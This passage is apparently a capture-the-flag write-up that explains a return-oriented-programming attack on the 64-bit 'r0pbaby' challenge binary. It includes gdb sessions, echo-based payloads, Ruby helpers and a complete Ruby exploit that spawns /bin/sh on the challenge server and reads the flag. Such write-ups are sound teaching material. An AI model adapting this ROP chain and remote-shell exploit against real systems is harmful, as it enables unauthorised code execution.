|       AAAAAAAA       | <-- overflowable variable must start here
+----------------------+
|                      |
|                      |
|     [local vars]     |
|                      |
|                      | <-- rsp
+----------------------+ <-- end of main()'s stack frame
|...lower addresses....|
+----------------------+
Since I have ASLR off on my computer (if you do turn it off, please make sure you turn it back on!), I can pre-compute the addresses I need.
Symbol system: 0x00007FFFF7883960 (from the program)
sh_addr = system_addr + 0x11f71c
sh_addr = 0x00007ffff7883960 + 0x11f71c
sh_addr = 0x7ffff79a307c
gadget_addr = system_addr + 0xa7969
gadget_addr = 0x00007ffff7883960 + 0xa7969
gadget_addr = 0x7ffff792b2c9
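Converting those addresses into little-endian escape sequences by hand is error-prone, so here’s a small Ruby sketch that does it. The helper name is made up; the offsets are the ones for my copy of libc.

```ruby
system_addr = 0x00007FFFF7883960
sh_addr     = system_addr + 0x11f71c
gadget_addr = system_addr + 0xa7969

# Hypothetical helper: render a 64-bit address as \xNN escapes, little endian,
# ready to paste into an echo -ne string.
def echo_escape(addr)
  [addr].pack("Q<").bytes.map { |b| "\\x%02x" % b }.join
end

puts echo_escape(gadget_addr) # \xc9\xb2\x92\xf7\xff\x7f\x00\x00
puts echo_escape(sh_addr)     # \x7c\x30\x9a\xf7\xff\x7f\x00\x00
puts echo_escape(system_addr) # \x60\x39\x88\xf7\xff\x7f\x00\x00
```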
So now, let’s change the exploit we used to crash it a long time ago (we replace the “B”s with the address of our gadget, in little endian format):
$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00CCCCCCCCDDDDDDDD\n' | ./r0pbaby
Welcome to an easy Return Oriented Programming challenge...
[...]
Menu:
Segmentation fault (core dumped)
Great! It crashed as expected! Let’s take a look at HOW it crashed:
$ gdb -q ./r0pbaby ./core
Core was generated by `./r0pbaby'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x00007ffff792b2cb in clone () from /lib64/libc.so.6
(gdb) x/i $rip
=> 0x7ffff792b2cb <clone+107>: call rax
It crashed on the call at the end of the gadget, which makes sense! Let’s check out what it’s trying to call and what it’s using as a parameter:
(gdb) print/x $rax
$1 = 0x4343434343434343
(gdb) print/x $rdi
$2 = 0x4444444444444444
It’s trying to call “CCCCCCCC” with the parameter “DDDDDDDD”. Awesome! Let’s try it again, but this time we’ll plug in our sh_address in place of “DDDDDDDD” to make sure that’s working (I strongly believe in incremental testing :) ):
$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00CCCCCCCC\x7c\x30\x9a\xf7\xff\x7f\x00\x00\n' | ./r0pbaby
[...]
Segmentation fault (core dumped)
$ gdb -q ./r0pbaby ./core
[...]
(gdb) x/i $rip
=> 0x7ffff792b2cb <clone+107>: call rax
It’s still crashing in the same place! We don’t have to check rax, we know it’ll be 0x4343434343434343 (“CCCCCCCC”) again. But let’s check out if rdi is right:
(gdb) print/x $rdi
$2 = 0x7ffff79a307c
(gdb) x/s $rdi
0x7ffff79a307c: "/bin/sh"
All right, the parameter is set properly!
One last step: Replace the return address (“CCCCCCCC”) with the address of system 0x00007ffff7883960:
$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00\x60\x39\x88\xf7\xff\x7f\x00\x00\x7c\x30\x9a\xf7\xff\x7f\x00\x00\n' | ./r0pbaby
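Unfortunately, you can’t return into system() this way. I couldn’t figure out why, but on Twitter Jan Kadijk said that it’s likely because the shell that system() starts exits as soon as it sees the end of file (EOF) on stdin, which makes perfect sense: once echo has written the payload, there’s nothing left on the pipe.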
So in the interest of proving that this actually returns to a function, we’ll call printf (0x00007FFFF7892F10) instead:
$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00\x10\x2f\x89\xf7\xff\x7f\x00\x00\x7c\x30\x9a\xf7\xff\x7f\x00\x00\n' | ./r0pbaby
Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Enter bytes to send (max 1024): 1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
/bin/sh
It prints out its first parameter - “/bin/sh” - proving that printf() was called and therefore the return chain works!
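The echo strings above can also be generated rather than typed. Here’s a minimal Ruby sketch that builds the same stdin input from three addresses; the function name is made up, and the addresses are the ASLR-off values from my machine.

```ruby
# Hypothetical helper: build the menu input for option 3.
# Layout: 8 filler bytes (saved frame pointer), gadget address,
# address for call rax, then the value that ends up in rdi.
def build_input(call_addr, gadget_addr, arg_addr)
  payload = "AAAAAAAA".b + [gadget_addr, call_addr, arg_addr].pack("Q<*")
  "3\n#{payload.bytesize}\n".b + payload + "\n".b
end

printf_addr = 0x00007FFFF7892F10
gadget_addr = 0x7ffff792b2c9
sh_addr     = 0x7ffff79a307c

input = build_input(printf_addr, gadget_addr, sh_addr)
puts input.bytesize
```

Writing the result to a file with File.binwrite and redirecting that file into ./r0pbaby should behave the same as the echo pipeline.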
The exploit
Here’s the full exploit in Ruby. If you want to run this against your own system, you’ll have to calculate the offset of the “/bin/sh” string and the handy-dandy gadget first! Just find them in IDA or objdump or whatever and subtract the address of system() from them.
#!/usr/bin/ruby

require 'socket'

# Offsets from system() to the "/bin/sh" string and to the gadget.
# The *_MINE values are for my local libc (computed above); the *_REAL
# values are the ones used against the live service.
SH_OFFSET_REAL = 0x13669b
SH_OFFSET_MINE = 0x11f71c

GADGET_OFFSET_REAL = 0xb3e39
GADGET_OFFSET_MINE = 0xa7969

#HOST = "localhost"
HOST = "r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me"
PORT = 10436

s = TCPSocket.new(HOST, PORT)

# Receive until the string matches the regex, then delete everything
# up to the regex
def recv_until(s, regex)
  buffer = ""
  loop do
    buffer += s.recv(1024)
    if(buffer =~ /#{regex}/m)
      return buffer.gsub(/.*#{regex}/m, '')
    end
  end
end

# Get the address of "system"
puts("Getting the address of system()...")
s.write("2\n")
s.write("system\n")
system_addr = recv_until(s, "Symbol system: ").to_i(16)
puts("system() is at 0x%08x" % system_addr)

# Build the ROP chain
# ("Q<" packs a 64-bit little-endian value; the "<" goes after the "Q")
puts("Building the ROP chain...")
payload = "AAAAAAAA" +
  [system_addr + GADGET_OFFSET_REAL].pack("Q<") + # address of the gadget
  [system_addr].pack("Q<") +                      # address of system
  [system_addr + SH_OFFSET_REAL].pack("Q<") +     # address of "/bin/sh"
  ""

# Write the ROP chain
puts("Sending the ROP chain...")
s.write("3\n")
s.write("#{payload.length}\n")
s.write(payload)

# Tell the program to exit
puts("Exiting the program...")
s.write("4\n")

# Give sh some time to start
puts("Pausing...")
sleep(1)

# Write the command we want to run
puts("Attempting to read the flag!")
s.write("cat /home/r0pbaby/flag\n")

# Receive forever
loop do
  x = s.recv(1024)

  if(x.nil? || x == "")
    puts("Done!")
    exit
  end

  puts(x)
end
[update] Or... do it the easy way
After I posted this, I got a tweet from @gaasedelen informing me that libc has a “magic” address that will literally call exec() with “/bin/sh”, making much of this unnecessary for this particular level. You can find it by seeing where the “/bin/sh” string is referenced. You can return to that address and a shell pops.
But it’s still a good idea to know how to construct a ROP chain, even if it’s not strictly necessary. :)
Conclusion
And that’s how to perform a ROP attack against a 64-bit binary! I’d love to hear feedback!